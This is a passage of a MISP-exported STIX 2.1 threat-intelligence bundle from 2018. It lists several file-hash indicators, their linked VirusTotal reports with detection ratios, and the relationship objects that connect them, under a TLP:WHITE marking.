"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:25.000Z",
"modified": "2018-09-19T05:21:25.000Z",
"pattern": "[file:hashes.MD5 = '55142f1d393c5ba7405239f232a6c059' AND file:hashes.SHA1 = 'effa37b97174802f17f3c75f25928226b7cd80ba' AND file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:24.000Z",
"modified": "2018-09-19T05:21:24.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-18T18:37:52",
"category": "Other",
"uuid": "d289e539-f5be-4002-9ae9-d3bf3a0c4b6c"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c/analysis/1537295872/",
"category": "External analysis",
"uuid": "9f4ff50c-787c-4ffe-bde1-c802d2f1a658"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "11/58",
"category": "Other",
"uuid": "433d9d46-b96e-4c76-9134-de36185263bb"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:28.000Z",
"modified": "2018-09-19T05:21:28.000Z",
"pattern": "[file:hashes.MD5 = '601080e36cd6a757684e0996afd9a0e6' AND file:hashes.SHA1 = 'e818a9a229d93e6bfe0285c8a155dcaceb03b03d' AND file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:28Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:26.000Z",
"modified": "2018-09-19T05:21:26.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-19T03:31:25",
"category": "Other",
"uuid": "f49f7c54-6abf-441e-af78-252779b3999b"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6/analysis/1537327885/",
"category": "External analysis",
"uuid": "4fdb1fd9-d5e9-4521-818f-912d41c677bd"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "2/58",
"category": "Other",
"uuid": "e8a2ade3-e01e-4b65-ad3c-87d11345213f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:30.000Z",
"modified": "2018-09-19T05:21:30.000Z",
"pattern": "[file:hashes.MD5 = '3a3ae909caee915af927c29a6025d16c' AND file:hashes.SHA1 = '81e7207f502229769d2d7979f88235261053c24b' AND file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:30Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:29.000Z",
"modified": "2018-09-19T05:21:29.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-19T03:31:19",
"category": "Other",
"uuid": "9707f2d5-8180-48c6-80e2-025cf0854494"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78/analysis/1537327879/",
"category": "External analysis",
"uuid": "a826a3c1-863e-4783-a3d7-6681f99f56c4"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "42/67",
"category": "Other",
"uuid": "13fdd406-d4b9-4915-b544-d01eafb9c379"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:33.000Z",
"modified": "2018-09-19T05:21:33.000Z",
"pattern": "[file:hashes.MD5 = '1ef7d145bf7153292ea33fe7c900ece9' AND file:hashes.SHA1 = '8f0323e577d4df82c7faa4cd6ba7303b38b6a26e' AND file:hashes.SHA256 = 'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:31.000Z",
"modified": "2018-09-19T05:21:31.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-19T03:31:28",
"category": "Other",
"uuid": "2a60357e-ee2f-464b-94fe-aaecf41cc0dd"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50/analysis/1537327888/",
"category": "External analysis",
"uuid": "7a27e755-1f59-493b-9614-e9179f2be1e6"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "38/66",
"category": "Other",
"uuid": "eb43528e-3ebb-45ba-a024-ab76913aa644"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"pattern": "[file:hashes.MD5 = 'a6484c6e007b1277164dd49115e5e271' AND file:hashes.SHA1 = '0308aaea4d969bc7fe4391e86b14c4908ab6adbe' AND file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-09-19T05:21:35Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-09-19T05:21:33.000Z",
"modified": "2018-09-19T05:21:33.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-18T12:02:50",
"category": "Other",
"uuid": "2b1a7a8f-99fc-4684-98e7-f38d718555a8"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885/analysis/1537272170/",
"category": "External analysis",
"uuid": "7d67a45d-37b8-4972-93be-68eb79124851"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "20/58",
"category": "Other",
"uuid": "f916ec81-9212-4dc6-bef9-dc7982bd15a3"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--62c44254-dfdd-46a5-8405-b822bd1e8729",
"created": "2018-09-19T05:21:34.000Z",
"modified": "2018-09-19T05:21:34.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
"target_ref": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d",
"created": "2018-09-19T05:21:34.000Z",
"modified": "2018-09-19T05:21:34.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
"target_ref": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--3a5866c4-e62f-456c-822c-e656cef75d59",
"created": "2018-09-19T05:21:34.000Z",
"modified": "2018-09-19T05:21:34.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03",
"target_ref": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0",
"target_ref": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--97dce8d6-48a2-4712-bd1a-378edec44abe",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9",
"target_ref": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961",
"target_ref": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07",
"target_ref": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c",
"target_ref": "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a",
"target_ref": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c",
"target_ref": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--d20dc510-00b2-4562-862d-af956e2cd62b",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba",
"target_ref": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--2dd0a986-b772-4b30-b878-9e1e211e7482",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096",
"target_ref": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa",
"target_ref": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e",
"target_ref": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6",
"created": "2018-09-19T05:21:35.000Z",
"modified": "2018-09-19T05:21:35.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
"target_ref": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
} |